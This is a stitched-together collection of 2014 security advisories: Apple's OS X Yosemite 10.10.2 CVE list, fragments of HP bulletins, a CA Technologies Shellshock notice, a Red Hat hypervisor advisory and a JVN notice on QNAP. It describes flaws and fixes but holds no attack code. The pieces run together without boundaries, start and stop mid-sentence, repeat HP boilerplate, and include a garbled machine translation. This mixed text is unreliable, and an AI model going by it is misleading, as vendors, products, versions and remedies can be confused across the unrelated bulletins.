disallowing logging of credentials. CVE-ID CVE-2014-4499 : Sten Petersen CoreGraphics Available for: OS X Yosemite v10.10 and v10.10.1 Impact: Some third-party applications with non-secure text entry and mouse events may log those events Description: Due to the combination of an uninitialized variable and an application's custom allocator, non-secure text entry and mouse events may have been logged. This issue was addressed by ensuring that logging is off by default. This issue did not affect systems prior to OS X Yosemite. CVE-ID CVE-2014-1595 : Steven Michaud of Mozilla working with Kent Howard CoreGraphics Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of PDF files. The issue was addressed through improved bounds checking. This issue does not affect OS X Yosemite systems. CVE-ID CVE-2014-8816 : Mike Myers, of Digital Operatives LLC CoreSymbolication Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple type confusion issues existed in coresymbolicationd's handling of XPC messages. These issues were addressed through improved type checking. CVE-ID CVE-2014-8817 : Ian Beer of Google Project Zero FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Processing a maliciously crafted .dfont file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of .dfont files. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4484 : Gaurav Baruah working with HP's Zero Day Initiative FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4483 : Apple Foundation Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Viewing a maliciously crafted XML file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the XML parser. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4485 : Apple Intel Graphics Driver Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Multiple vulnerabilities in Intel graphics driver Description: Multiple vulnerabilities existed in the Intel graphics driver, the most serious of which may have led to arbitrary code execution with system privileges. This update addresses the issues through additional bounds checks. CVE-ID CVE-2014-8819 : Ian Beer of Google Project Zero CVE-2014-8820 : Ian Beer of Google Project Zero CVE-2014-8821 : Ian Beer of Google Project Zero IOAcceleratorFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A null pointer dereference existed in IOAcceleratorFamily's handling of certain IOService userclient types. This issue was addressed through improved validation of IOAcceleratorFamily contexts. CVE-ID CVE-2014-4486 : Ian Beer of Google Project Zero IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A buffer overflow existed in IOHIDFamily. This issue was addressed with improved bounds checking. CVE-ID CVE-2014-4487 : TaiG Jailbreak Team IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A validation issue existed in IOHIDFamily's handling of resource queue metadata. This issue was addressed through improved validation of metadata. CVE-ID CVE-2014-4488 : Apple IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A null pointer dereference existed in IOHIDFamily's handling of event queues. This issue was addressed through improved validation of IOHIDFamily event queue initialization. CVE-ID CVE-2014-4489 : @beist IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Executing a malicious application may result in arbitrary code execution within the kernel Description: A bounds checking issue existed in a user client vended by the IOHIDFamily driver which allowed a malicious application to overwrite arbitrary portions of the kernel address space. The issue is addressed by removing the vulnerable user client method. CVE-ID CVE-2014-8822 : Vitaliy Toropov working with HP's Zero Day Initiative IOKit Available for: OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments. CVE-ID CVE-2014-4389 : Ian Beer of Google Project Zero IOUSBFamily Available for: OS X Yosemite v10.10 and v10.10.1 Impact: A privileged application may be able to read arbitrary data from kernel memory Description: A memory access issue existed in the handling of IOUSB controller user client functions. This issue was addressed through improved argument validation. CVE-ID CVE-2014-8823 : Ian Beer of Google Project Zero Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Specifying a custom cache mode allowed writing to kernel read-only shared memory segments. This issue was addressed by not granting write permissions as a side-effect of some custom cache modes. CVE-ID CVE-2014-4495 : Ian Beer of Google Project Zero Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata. CVE-ID CVE-2014-8824 : @PanguTeam Kernel Available for: OS X Yosemite v10.10 and v10.10.1 Impact: A local attacker can spoof directory service responses to the kernel, elevate privileges, or gain kernel execution Description: Issues existed in identitysvc validation of the directory service resolving process, flag handling, and error handling. This issue was addressed through improved validation. CVE-ID CVE-2014-8825 : Alex Radocea of CrowdStrike Kernel Available for: OS X Yosemite v10.10 and v10.10.1 Impact: A local user may be able to determine kernel memory layout Description: Multiple uninitialized memory issues existed in the network statistics interface, which led to the disclosure of kernel memory content. This issue was addressed through additional memory initialization. CVE-ID CVE-2014-4371 : Fermin J. Serna of the Google Security Team CVE-2014-4419 : Fermin J. Serna of the Google Security Team CVE-2014-4420 : Fermin J. Serna of the Google Security Team CVE-2014-4421 : Fermin J. Serna of the Google Security Team Kernel Available for: OS X Mavericks v10.9.5 Impact: A person with a privileged network position may cause a denial of service Description: A race condition issue existed in the handling of IPv6 packets. This issue was addressed through improved lock state checking. CVE-ID CVE-2011-2391 Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Maliciously crafted or compromised applications may be able to determine addresses in the kernel Description: An information disclosure issue existed in the handling of APIs related to kernel extensions. Responses containing an OSBundleMachOHeaders key may have included kernel addresses, which may aid in bypassing address space layout randomization protection. This issue was addressed by unsliding the addresses before returning them. CVE-ID CVE-2014-4491 : @PanguTeam, Stefan Esser Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A validation issue existed in the handling of certain metadata fields of IOSharedDataQueue objects. This issue was addressed through relocation of the metadata. CVE-ID CVE-2014-4461 : @PanguTeam LaunchServices Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious JAR file may bypass Gatekeeper checks Description: An issue existed in the handling of application launches which allowed certain malicious JAR files to bypass Gatekeeper checks. This issue was addressed through improved handling of file type metadata. CVE-ID CVE-2014-8826 : Hernan Ochoa of Amplia Security libnetcore Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious, sandboxed app can compromise the networkd daemon Description: Multiple type confusion issues existed in networkd's handling of interprocess communication. The issue is addressed through additional type checking. CVE-ID CVE-2014-4492 : Ian Beer of Google Project Zero LoginWindow Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A Mac may not lock immediately upon wake Description: An issue existed in the rendering of the lock screen. This issue was address through improved screen rendering while locked. CVE-ID CVE-2014-8827 : Xavier Bertels of Mono, and multiple OS X seed testers lukemftp Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Using the command line ftp tool to fetch files from a malicious http server may lead to arbitrary code execution Description: A command injection issue existed in the handling of HTTP redirects. This issue was addressed through improved validation of special characters. CVE-ID CVE-2014-8517 OpenSSL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Multiple vulnerabilities in OpenSSL 0.9.8za, including one that may allow an attacker to downgrade connections to use weaker cipher-suites in applications using the library Description: Multiple vulnerabilities existed in OpenSSL 0.9.8za. These issues were addressed by updating OpenSSL to version 0.9.8zc. CVE-ID CVE-2014-3566 CVE-2014-3567 CVE-2014-3568 Sandbox Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A design issue existed in the caching of sandbox profiles which allowed sandboxed applications to gain write access to the cache. This issue was addressed by restricting write access to paths containing a "com.apple.sandbox" segment. This issue does not affect OS X Yosemite v10.10 or later. CVE-ID CVE-2014-8828 : Apple SceneKit Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application could execute arbitrary code leading to compromise of user information Description: Multiple out of bounds write issues existed in SceneKit. These issues were addressed through improved bounds checking. CVE-ID CVE-2014-8829 : Jose Duart of the Google Security Team SceneKit Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Viewing a maliciously crafted Collada file may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow existed in SceneKit's handling of Collada files. This issue was addressed through improved validation of accessor elements. CVE-ID CVE-2014-8830 : Jose Duart of Google Security Team Security Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A downloaded application signed with a revoked Developer ID certificate may pass Gatekeeper checks Description: An issue existed with how cached application certificate information was evaluated. This issue was addressed with cache logic improvements. CVE-ID CVE-2014-8838 : Apple security_taskgate Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: An app may access keychain items belonging to other apps Description: An access control issue existed in the Keychain. Applications signed with self-signed or Developer ID certificates could access keychain items whose access control lists were based on keychain groups. This issue was addressed by validating the signing identity when granting access to keychain groups. CVE-ID CVE-2014-8831 : Apple Spotlight Available for: OS X Yosemite v10.10 and v10.10.1 Impact: The sender of an email could determine the IP address of the recipient Description: Spotlight did not check the status of Mail's "Load remote content in messages" setting. This issue was addressed by improving configuration checking. CVE-ID CVE-2014-8839 : John Whitehead of The New York Times, Frode Moe of LastFriday.no Spotlight Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Spotlight may save unexpected information to an external hard drive Description: An issue existed in Spotlight where memory contents may have been written to external hard drives when indexing. This issue was addressed with better memory management. CVE-ID CVE-2014-8832 : F-Secure SpotlightIndex Available for: OS X Yosemite v10.10 and v10.10.1 Impact: Spotlight may display results for files not belonging to the user Description: A deserialization issue existed in Spotlight's handling of permission caches. A user performing a Spotlight query may have been shown search results referencing files for which they don't have sufficient privileges to read. This issue was addressed with improved bounds checking. CVE-ID CVE-2014-8833 : David J Peacock, Independent Technology Consultant sysmond Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with root privileges Description: A type confusion vulnerability existed in sysmond that allowed a local application to escalate privileges. The issue was addressed with improved type checking. CVE-ID CVE-2014-8835 : Ian Beer of Google Project Zero UserAccountUpdater Available for: OS X Yosemite v10.10 and v10.10.1 Impact: Printing-related preference files may contain sensitive information about PDF documents Description: OS X Yosemite v10.10 addressed an issue in the handling of password-protected PDF files created from the Print dialog where passwords may have been included in printing preference files. This update removes such extraneous information that may have been present in printing preference files. CVE-ID CVE-2014-8834 : Apple Note: OS X Yosemite 10.10.2 includes the security content of Safari 8.0.3. For further details see https://support.apple.com/kb/HT204243 OS X Yosemite 10.10.2 and Security Update 2015-001 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) iQIcBAEBAgAGBQJUx8ufAAoJEBcWfLTuOo7tWecQAIFvaOlK0Ar2vbUaH0TIpO9F N9SbkWmdNHDNUvc3LJOaeVfAFlXPbgHYqXGIC0kZiRL5Kyhy/K2hH29iNoIDqfET D1jPWOaAFhzvohViYl12ne/A7bBs5v+3G6gqmGCDCqGyn5VFdUMmS0/ZJSCUkPQG LqTvj5D4ulYl8I5uA9Ur9jD2j/TkSCOWiSTO5diMlt1WcKb1fn5pl9b0YNweI8UX FcZPrIlVNeaSywuitdxZEcWOhsJYbS6Xw13crS/HNJGEO+5N7keCnCJiN9HW4Pt6 8iNAgkSWX6S8nP6mq3tiKJmvh6Qj88tvSLgotc79+C8djvkwkxr3611sSLRUStI/ qmwDeJS+rvNgFiLbcJjDDH1EC3qBqMb5mIsMtnXKDDMS8mNeJHaQFngK2YacFLuW gzAMZIcEhLpWq46rYHBsPsB1iG1shyxxz1zL+JKNAi1aTtfFrP3aItQBUG5T345V 0oJol8oxzen9KLNYJMvE9CTJlrRr204DoQkmhY2dUP2W1EQoEGw2qzy/zBIq0yFA 0FNVcSXE+T4yCyHRGakK/sccw6lyCP0xS/lgaPlkyHsFT3oalu9yyqNtDCJl/Cns sAa5dw0tlb8/zWQ3fsJna2yrw5xSboA5KWegtrjtjodrz8O1MjRrTPgx8AnLjKzq nggZl3Sa+QhfaHSUqSJI =uAqk -----END PGP SIGNATURE----- . Open the PXE Configuration Utility on the HP Insight Control server deployment window Select Linux Managed from the Boot Menu options Click the Edit button. Clicking the Edit button displays the Edit Shared Menu Option window Uncheck the x86 option in Operating System and Processor Options and click OK. HP Vertica AMI's and Virtual Machines prior to v7.1.1-0. HP has released the following updates to resolve this vulnerability for HP Vertica products. Update to the latest VM image available at: https://my.vertica.com For customers using the AMI version HP Vertica Analytics platform, please install the latest image available at Amazon. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2014 Hewlett-Packard Development Company, L.P. Note: HP and the switch vendor recommend running an active version of Fabric OS (FOS) listed on the HP Single Point of Connectivity Knowledge (SPOCK) website ( http://h20272.www2.hp.com/ ) and applying the work-around information provided in the MITIGATION INFORMATION section below to protect HP StoreFabric B-series switches from this vulnerability. Fabric OS (FOS) v7.3.0b (This version will be available soon and this bulletin will revised at that time) The following focused fix FOS versions are available for the previously released versions and have been renamed to include an additional hexadecimal character appended to the FOS version on which it is based: FOS v7.2.1c1 FOS v7.2.0d6 FOS v7.1.2b1 FOS v7.1.1c1 FOS v7.1.0cb FOS v7.0.2e1 FOS v7.0.0d1 FOS v6.4.3f3 FOS v6.4.2a3 FOS v6.2.2f9 MITIGATION INFORMATION HP recommends the following steps to reduce the risk of this vulnerability: - Place the HP StoreFabric SAN switch and other data center critical infrastructure behind a firewall to disallow access from the Internet. - Change all HP StoreFabric switch default account passwords, including the root passwords, from the default factory passwords. - Examine the list of accounts, including ones on the switch and those existing on remote authentication servers such as RADIUS, LDAP, and TACAS+, to ensure only necessary personnel can gain access to HP StoreFabric FOS switches. Delete guest accounts and temporary accounts created for one-time usage needs. - Utilize FOS password policy management to strengthen the complexity, age, and history requirements of switch account passwords

The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. GNU Bash 3.2 and later are vulnerable; prior versions may also be affected. This vulnerability allows users that have been granted access to a shell script to escalate privilege and execute unrestricted commands at the same security level as the Bash script. -----BEGIN PGP SIGNED MESSAGE----- CA20141001-01: Security Notice for Bash Shellshock Vulnerability Issued: October 01, 2014 Updated: October 03, 2014 CA Technologies is investigating multiple GNU Bash vulnerabilities, referred to as the "Shellshock" vulnerabilities, which were publicly disclosed on September 24-27, 2014. CVE identifiers CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278 have been assigned to these vulnerabilities. The CA Technologies Enterprise Information Security team has led a global effort to identify and remediate systems and products discovered with these vulnerabilities. We continue to patch our systems as fixes become available, and we are providing fixes for affected CA Technologies products. CA Technologies continues to aggressively scan our environments (including servers, networks, external facing applications, and SaaS environments) to proactively monitor, identify, and remediate any vulnerability when necessary. Risk Rating High Platform AIX Android (not vulnerable, unless rooted) Apple iOS (not vulnerable unless jailbroken) Linux Mac OS X Solaris Windows (not vulnerable unless Cygwin or similar ported Linux tools with Bash shell are installed) Other UNIX/BSD based systems if Bash is installed Any other OS or JeOS that utilizes Bash Affected Products The following products have been identified as potentially vulnerable, and we have made fixes available for all of these products. CA API Management (Linux appliance only) CA Application Performance Management (TIM is the only affected APM component) CA Application Performance Management Cloud Monitor CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM) CA Layer 7 products (API Gateway, Mobile Access Gateway, API Management Portal) CA User Activity Reporting Module (Enterprise Log Manager) Note: This security notice will be updated if other CA Technologies products are determined to be vulnerable. In most cases, the Bash vulnerabilities will need to be patched by OS vendors. Exceptions may include CA Technologies appliances, and software products that include Linux, UNIX or Mac OS X based operating systems (that include Bash). Affected Components CentOS Cygwin GNU Bash Red Hat Enterprise Linux SUSE Linux Non-Affected Products IMPORTANT NOTE: This listing includes only a small subset of the unaffected CA Technologies products. We're including unaffected products that customers have already inquired about. While the following CA Technologies products are not directly affected by the Bash vulnerabilities, the underlying operating systems that CA Technologies software is installed on may be vulnerable. We strongly encourage our customers to follow the recommendations provided by their vendors for all operating systems they utilize. All CA SaaS / On Demand products were either not vulnerable or have already been patched. CA AHS / PaymentMinder - AHS App is not vulnerable. The AHS app does not execute CGI scripts, or spawn or execute shell commands from within the app. AHS infrastructure already patched. CA Asset Portfolio Management CA AuthMinder (Arcot WebFort) CA AuthMinder for Business Users CA AuthMinder for Consumers CA AutoSys products - We use the bash shell that comes with the operating system and the customer is responsible for patching their OS. Additionally, the agents themselves do not distribute any scripts that use bash. CA Clarity On Demand CA CloudMinder - CloudMinder does not include the Bash Shell in BoM, or use it, but because we are deployed on RHEL, customers may be indirectly affected. Customers using RHEL should apply patches provided by Red Hat. CA Console Management for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI. CA ControlMinder CA DataMinder (formerly DLP) products – Software and appliance confirmed not vulnerable. Note: Linux Agents shipped, but no public SSH or Web apps are used in these agents. Customers should patch bash shell on any Linux server with DataMinder agents. DataMinder agents should continue to function normally. CA Digital Payments SaaS (previously patched) CA Directory CA eCommerce SaaS / On Demand (previously patched) CA Endevor Software Change Manager CA Federation (formerly SiteMinder Federation) CA GovernanceMinder CA IdentityMinder CA Infrastructure Management CA JCLCheck CA Job Management for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI. CA NetQoS GigaStor Observer Expert CA Network Flow Analysis CA Performance Management for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI. CA RiskMinder CA Service Desk Manager CA Service Operations Insight (SOI) CA SiteMinder CA SOLVE:Access CA Spectrum for Linux - Not vulnerable. Be sure to apply bash fixes from your underlying operating system vendor. CA Strong Authentication CA System Watchdog for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI. CA Top Secret CA Universal Job Management Agent for OpenVMS - Our OpenVMS products do not bundle bash, and they do not supply bash scripts; we use nothing but the native DCL CLI. CA Virtual Assurance for Infrastructure Managers (VAIM) Solution CA Technologies has issued the following fixes to address the vulnerabilities. CA API Management: Patches for Linux appliance are available through CA Support to customers of Gateway (applicable for all versions – 6.1.5, 6.2, 7.0, 7.1, 8.0, 8.1, 8.1.1, 8.1.02). CA Application Performance Management: KB article for APM TIM has been published. APM TIM is the only part of APM that was affected. Refer to TEC618037. CA Application Performance Management Cloud Monitor: New images are available for subscribers. Download the latest OPMS version 8.2.1.5. For assistance, contact CA Support. CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM): Very low risk. 9.6 is not affected. 9.5 Installation uses Bash. We do not use Bash at all for the CEM operating system that we have shipped in the past. This means that customers who patch the OS will not impact the ability of the CEM TIMsoft from operating. However prior to version 9.6, the TIM installation script does use the bash shell. See new KB article TEC618037 for additional information. CA Layer 7 (API Gateway, Mobile Access Gateway, API Management Portal): Fixes for all Bash vulnerabilities and a security bulletin are available on the Layer 7 Support website. CA User Activity Reporting Module (Enterprise Log Manager): All 12.5 and 12.6 GA versions are potentially affected. Patches provided on 2014-09-30. To get the patch, use the OS update functionality to get the latest R12.6 SP1 subscription update. Note that you can update R12.5 SPx with the R12.6 SP1 OS update. For assistance, contact CA Support. Workaround None To help mitigate the risk, we do strongly encourage all customers to follow patch management best practices, and in particular for operating systems affected by the Bash Shellshock vulnerabilities. References CVE-2014-6271 - Bash environment variable command injection CVE-2014-7169 - Bash environment variable incomplete fix for CVE-2014-6271 CVE-2014-7186 - Bash parser redir_stack memory corruption CVE-2014-7187 - Bash nested flow control constructs off-by-one CVE-2014-6277 - Bash untrusted pointer use uninitialized memory CVE-2014-6278 - Bash environment variable command injection CA20141001-01: Security Notice for Bash Shellshock Vulnerability https://support.ca.com/irj/portal/anonymous/phpsbpldgpg Change History v1.0: 2014-10-01, Initial Release v1.1: 2014-10-02, Added AuthMinder, Strong Authentication, VAIM, Clarity OD, All SaaS/OD products to list of Non-Affected Products. v1.2: 2014-10-03, Added RiskMinder to Non-Affected Products. Updated UARM solution info. If additional information is required, please contact CA Technologies Support at https://support.ca.com. If you discover a vulnerability in CA Technologies products, please report your findings to the CA Technologies Product Vulnerability Response Team at vuln@ca.com. PGP key: support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782 Security Notices https://support.ca.com/irj/portal/anonymous/phpsbpldgpg Regards, Ken Williams Director, Product Vulnerability Response Team CA Technologies | One CA Plaza | Islandia, NY 11749 | www.ca.com Ken.Williams@ca.com | vuln@ca.com Copyright © 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 11749. All other trademarks, trade names, service marks, and logos referenced herein belong to their respective companies. -----BEGIN PGP SIGNATURE----- Version: Encryption Desktop 10.3.2 (Build 15238) Charset: utf-8 wsBVAwUBVDK+PZI1FvIeMomJAQFl/Af/TqrSE/h4r3gs9PwrWKdt21PCRI3za9Lx M5ZyTdVDIQ9ybgPkLqsovNRPgVqd7zwDHsx0rzvF5Y82uO+vQ63BuEV2GnczAax/ EiAW4WVxUgWG+lAowGV55Of8ruv/gOiAWTjFhkqpsyVg96ZMw2HLG62IwZL1j0qa oLCu0y3VrGvqH0g2hi75QwHAjNCdlEsD4onUqTCc9cRTdLwFCZrUQ8KTrqIL7LK5 Uo5T9C1UeAyNTo3KiJ/zw3BCOTkpl99dmg3NW0onU/1r1CXdlyS7opLB+GJ+xGwP xRQdUsOIhzfRzx7bsao2D43IhDnzJBBFJHdeMPo18WBTfJ7aUgBwGQ== =B62b -----END PGP SIGNATURE----- . HP Product Firmware Version HP StoreEver ESL G3 Tape Libraries with MCB version 2 680H_GS40701 HP StoreEver ESL G3 Tape Libraries with MCB version 1 656H_GS10801 The firmware is customer installable and is available in the Drivers, Software & Firmware section at the following location: http://www.hp.com/support/eslg3 Notes: - Updating the library firmware requires a reboot of the library. - If the library firmware cannot be updated, HP recommends following the Mitigation Instructions below. - Disable DHCP and only use static IP addressing. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: rhev-hypervisor6 security update Advisory ID: RHSA-2014:1354-01 Product: Red Hat Enterprise Virtualization Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1354.html Issue date: 2014-10-02 CVE Names: CVE-2014-1568 CVE-2014-6271 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 ===================================================================== 1. Summary: An updated rhev-hypervisor6 package that fixes several security issues is now available. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures: RHEV-M 3.4 - noarch 3. Description: The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent. Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions. A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-6271) It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-7169) A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. (CVE-2014-1568) It was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code. (CVE-2014-7186) An off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. (CVE-2014-7187) Red Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges Antoine Delignat-Lavaud and Intel Product Security Incident Response Team as the original reporters of CVE-2014-1568. Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package. Package List: RHEV-M 3.4: Source: rhev-hypervisor6-6.5-20140930.1.el6ev.src.rpm noarch: rhev-hypervisor6-6.5-20140930.1.el6ev.noarch.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-1568.html https://www.redhat.com/security/data/cve/CVE-2014-6271.html https://www.redhat.com/security/data/cve/CVE-2014-7169.html https://www.redhat.com/security/data/cve/CVE-2014-7186.html https://www.redhat.com/security/data/cve/CVE-2014-7187.html https://access.redhat.com/security/updates/classification/#critical 8. No other firmware stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below for the MDS products. This software versions 6.2(9a) has included the fixes for the vulnerability in HP StoreFabric C-series MDS switches which currently supporting NX-OS 6.X releases. This software version 5.2(8e) has included the fix for the vulnerability in HP C-series MDS switches which currently supporting NX-OS 5.X releases. This bulletin will be revised when these updates become available. MITIGATION INFORMATION If updating to a NX-OS version containing the fix is not currently possible, HP recommends the following steps to reduce the risk of this vulnerability: The "ssh" or "telnet" features may be disabled by the admin user. All MDS and Nexus 5K switches can function in this configuration. Access is available through the console port. HP Vertica AMI's and Virtual Machines prior to v7.1.1-0. HP has released the following updates to resolve this vulnerability for HP Vertica products. Update to the latest VM image available at: https://my.vertica.com For customers using the AMI version HP Vertica Analytics platform, please install the latest image available at Amazon. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2014 Hewlett-Packard Development Company, L.P. Please refer to the RESOLUTION section below for a list of impacted products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04558068 SUPPORT 